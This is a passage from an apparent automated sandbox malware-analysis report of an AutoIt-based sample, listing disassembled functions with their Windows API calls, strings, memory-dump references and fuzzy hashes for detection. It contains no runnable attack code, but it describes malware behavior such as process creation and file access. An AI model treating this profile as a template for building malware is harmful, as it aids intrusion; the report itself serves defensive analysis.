                                        • Instruction ID: 6f803984642109e81c9de70ea4a5a52c6618708956bf988e9f8c78942f75ac8b
                                        • Opcode Fuzzy Hash: dbfad59e15f111ecb3c612fe606ef564d2263adc54b23eca85f6d77e84aebd85
                                        • Instruction Fuzzy Hash: 4021C3B591031CAFDB10DFA4EC89B9DBBF4FB1A700F00412AF911E62A0D7B54548AF92
                                        Function 01190708 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0119074D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                        • Instruction ID: 48ae1d654a78b241f60a6be0af99fb1758e559001e7b02fac2fe66a3d5801162
                                        • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                        • Instruction Fuzzy Hash: 4551FA75A50208FBEF28DFA4CC49FDE7778AF4C700F108558F65AEA180DB749A448BA0
                                        Function 00E873E5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00EBEE62
                                        • 7523D0D0.COMDLG32(?), ref: 00EBEEAC
                                          • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                                          • Part of subcall function 00EA09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EA09F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: NamePath$7523FullLong_memset
                                        • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
                                        • API String ID: 3285060876-1954568251
                                        • Opcode ID: fc6ad2b956bf238f4744b6677b0195a98bd300099bb6508aab51d355f5dc6fe6
                                        • Instruction ID: 29672edc0c7834bd7f610668b78c3bbb3de4cd2337f051c974feff96e6738159
                                        • Opcode Fuzzy Hash: fc6ad2b956bf238f4744b6677b0195a98bd300099bb6508aab51d355f5dc6fe6
                                        • Instruction Fuzzy Hash: C721A470A042589BCB11EFA4C845BEE7BF89F49314F10405AE40CFB282DBF499499F91
                                        Function 00E839E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E83A15
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E83A36
                                        • ShowWindow.USER32(00000000,?,?), ref: 00E83A4A
                                        • ShowWindow.USER32(00000000,?,?), ref: 00E83A53
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: 29240cb4af450fbb636e4623d36db50f9de3c06bacd61cf9aaa603b6335a4d32
                                        • Instruction ID: ad4f76bd6e249affd0fd05ad889a1d138bd9529de57701fca4e8e94dcda0265b
                                        • Opcode Fuzzy Hash: 29240cb4af450fbb636e4623d36db50f9de3c06bacd61cf9aaa603b6335a4d32
                                        • Instruction Fuzzy Hash: 54F03A746402987EEF3117276C08E273E7DE7D7F50B00002ABD00E21B0C2E50800FAB2
                                        Function 00E8410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EBD5EC
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        • _memset.LIBCMT ref: 00E8418D
                                        • _wcscpy.LIBCMT ref: 00E841E1
                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E841F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                        • String ID: Line:
                                        • API String ID: 3942752672-1585850449
                                        • Opcode ID: bee50828b3b146b87b2c277d9f398d18797f6363ff41f8bcbb6ca4d8f857b663
                                        • Instruction ID: 3748b49ee414bea48c698117d53bd8c19bf4450ed2b0565601f7c87d0666fa00
                                        • Opcode Fuzzy Hash: bee50828b3b146b87b2c277d9f398d18797f6363ff41f8bcbb6ca4d8f857b663
                                        • Instruction Fuzzy Hash: 2D31A171009309AAD721FB60DC45BDB77E8AF56304F10551EB58DB20E1EBB4A648D793
                                        Function 00EA564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                        • String ID:
                                        • API String ID: 1559183368-0
                                        • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                        • Instruction ID: 779e997d07ec942afde5a806c167ae08009a970c927b620c247d79b46f768b42
                                        • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                        • Instruction Fuzzy Hash: 8051CA32A00B05DFDB248F79C8806AE77A5AF4A324F64972AF835BE1D0D770BD508B40
                                        Function 00E869CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E84F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84F6F
                                        • _free.LIBCMT ref: 00EBE68C
                                        • _free.LIBCMT ref: 00EBE6D3
                                          • Part of subcall function 00E86BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E86D0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                        • API String ID: 2861923089-1757145024
                                        • Opcode ID: b2749d739f4be268c282df12c136f903b0f5f5ef0fecb180632be55638908045
                                        • Instruction ID: 2f3f3c4223d6ae68a80d64b0c74c0d91168b6eb73ceafdb19f8b9f7ef319051a
                                        • Opcode Fuzzy Hash: b2749d739f4be268c282df12c136f903b0f5f5ef0fecb180632be55638908045
                                        • Instruction Fuzzy Hash: 5A914E71910219AFCF14EFA4C8919EEB7F4FF19314F14546AF81ABB2A1EB30A905DB50
                                        Function 011921A8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 160fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 01192098: Sleep.KERNELBASE(000001F4), ref: 011920A9
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011922EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateFileSleep
                                        • String ID: 7DK4Y9LWGJW4A5CH20QWZFQ9W4ZNHK
                                        • API String ID: 2694422964-8129067
                                        • Opcode ID: 8cf6f930d9b1b0ccf2c82e978e6faf96e62a1329bf7e978e87886e233e01b887
                                        • Instruction ID: 03ef2a9e1ec00edd6dec106fc3a5880244c4462dab2c694b832f0bcacaf240df
                                        • Opcode Fuzzy Hash: 8cf6f930d9b1b0ccf2c82e978e6faf96e62a1329bf7e978e87886e233e01b887
                                        • Instruction Fuzzy Hash: AE61A870D1828CEAEF15D7B4C858BDEBBB49F19304F044199E6587B2C1C7B90B49CB66
                                        Function 00E835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E835A1,SwapMouseButtons,00000004,?), ref: 00E835D4
                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E835A1,SwapMouseButtons,00000004,?,?,?,?,00E82754), ref: 00E835F5
                                        • RegCloseKey.KERNELBASE(00000000,?,?,00E835A1,SwapMouseButtons,00000004,?,?,?,?,00E82754), ref: 00E83617
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: b10d1f962472697784d22d0166ea4d6c0d41e3761006827f4f20d3b04483c35d
                                        • Instruction ID: 36458b21a69738bc6d173e95aab2c0a6f9f1a949dfdffba8d09865c5d7e5b694
                                        • Opcode Fuzzy Hash: b10d1f962472697784d22d0166ea4d6c0d41e3761006827f4f20d3b04483c35d
                                        • Instruction Fuzzy Hash: D5115A71910208BFDB20DF68DC40DEEBBB8EF04B44F0094A9F809E7210E2719F44A760
                                        Function 00EE97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E85045: _fseek.LIBCMT ref: 00E8505D
                                          • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AAE
                                          • Part of subcall function 00EE99BE: _wcscmp.LIBCMT ref: 00EE9AC1
                                        • _free.LIBCMT ref: 00EE992C
                                        • _free.LIBCMT ref: 00EE9933
                                        • _free.LIBCMT ref: 00EE999E
                                          • Part of subcall function 00EA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA9C64), ref: 00EA2FA9
                                          • Part of subcall function 00EA2F95: GetLastError.KERNEL32(00000000,?,00EA9C64), ref: 00EA2FBB
                                        • _free.LIBCMT ref: 00EE99A6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                        • String ID:
                                        • API String ID: 1552873950-0
                                        • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                        • Instruction ID: ea4051d2605339d775ce102b48eead7a99b5fbd125e60e1b6c71cd2a78341e07
                                        • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                        • Instruction Fuzzy Hash: 585150B1904258AFDF249F65DC81A9EBBB9EF48310F1014AEB60DB7242DB715E80CF58
                                        Function 00EA493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                        • String ID:
                                        • API String ID: 2782032738-0
                                        • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                        • Instruction ID: f2d98f6159a405269c80e0fb4edce14eeb9c7456fdb063a4ebb0d4ba02a8c862
                                        • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                        • Instruction Fuzzy Hash: F341E9B06007069BDB188E69C8805AF77A5EFCE354B24917DE855EF6C0E7B0BD508744
                                        Function 00EE901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __fread_nolock_memmove
                                        • String ID: EA06
                                        • API String ID: 1988441806-3962188686
                                        • Opcode ID: 39c97bfc987e2714a143be08bc236c9913ca5ffbae4cb049348d50e5040ae9e4
                                        • Instruction ID: 1ec6412506eda772fb85e3a7d6a5c3561ae960bdfd798981584c10baf3da6cdc
                                        • Opcode Fuzzy Hash: 39c97bfc987e2714a143be08bc236c9913ca5ffbae4cb049348d50e5040ae9e4
                                        • Instruction Fuzzy Hash: CA01F9728042586EDB28C7A9C856EEE7BF89B05301F00419AF552E6181E5B9EA048B60
                                        Function 00EA0FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EA594C: __FF_MSGBANNER.LIBCMT ref: 00EA5963
                                          • Part of subcall function 00EA594C: __NMSG_WRITE.LIBCMT ref: 00EA596A
                                          • Part of subcall function 00EA594C: RtlAllocateHeap.NTDLL(01150000,00000000,00000001), ref: 00EA598F
                                        • std::exception::exception.LIBCMT ref: 00EA102C
                                        • __CxxThrowException@8.LIBCMT ref: 00EA1041
                                          • Part of subcall function 00EA87DB: RaiseException.KERNEL32(?,?,00000000,00F3BAF8,?,00000001,?,?,?,00EA1046,00000000,00F3BAF8,00E89FEC,00000001), ref: 00EA8830
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                        • String ID: bad allocation
                                        • API String ID: 3902256705-2104205924
                                        • Opcode ID: 9b664631d53d5d000b4a3e34bc94cc34d96a8ce6cc7ce6a84b9fbdc76d8cd9d4
                                        • Instruction ID: 4c13c16042ac4d7acf569ff28d1c1d6cb1565db484a41586216332eee09267dd
                                        • Opcode Fuzzy Hash: 9b664631d53d5d000b4a3e34bc94cc34d96a8ce6cc7ce6a84b9fbdc76d8cd9d4
                                        • Instruction Fuzzy Hash: F3F0283550020DA6CB20BA98ED219DF77EC9F0A390F1010A6FC04FE192DFB0AAD0A2D0
                                        Function 01190DE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01190E2D
                                        • ExitProcess.KERNEL32(00000000), ref: 01190E4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743939760.000000000118F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0118F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_118f000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process$CreateExit
                                        • String ID: D
                                        • API String ID: 126409537-2746444292
                                        • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                        • Instruction ID: eb6d52d5b69f149ce647febc9fa1b9788d403f319c58f91277503af7614698a4
                                        • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                        • Instruction Fuzzy Hash: 1DF0C97154424CABDF64EFE0CC49FEE777CAB08701F408508BA1A9A180DB7496488B61
                                        Function 00EE9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00EE9B82
                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00EE9B99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Temp$FileNamePath
                                        • String ID: aut
                                        • API String ID: 3285503233-3010740371
                                        • Opcode ID: 4a98c16752fc3024537d4b19b4e85ed7adb8a86aad00d27eeb5a3b7e3318a52a
                                        • Instruction ID: 69fee3ace9b388d2077fb09752429a4d6a9f993f6a6101262cc6f2fd1bf658f1
                                        • Opcode Fuzzy Hash: 4a98c16752fc3024537d4b19b4e85ed7adb8a86aad00d27eeb5a3b7e3318a52a
                                        • Instruction Fuzzy Hash: 9BD05E7954030DABDB20DBA0EC0EF9A772CE704700F0042A1BE94910A1DEB0A5989B92
                                        Function 00EFCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 146384811a4323b6fa8ab5f874a23f117d32f88e6b10542de70225693e23a7be
                                        • Instruction ID: 3165d98082dca206c2792fdf4ad7bd937148202963aab616366f52e6d3c61a41
                                        • Opcode Fuzzy Hash: 146384811a4323b6fa8ab5f874a23f117d32f88e6b10542de70225693e23a7be
                                        • Instruction Fuzzy Hash: EFF16E719083059FC714DF28C880A6ABBE5FF88314F14996DF999AB351D731E945CF82
                                        Function 00E8F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EA03D3
                                          • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00EA03DB
                                          • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EA03E6
                                          • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EA03F1
                                          • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00EA03F9
                                          • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00EA0401
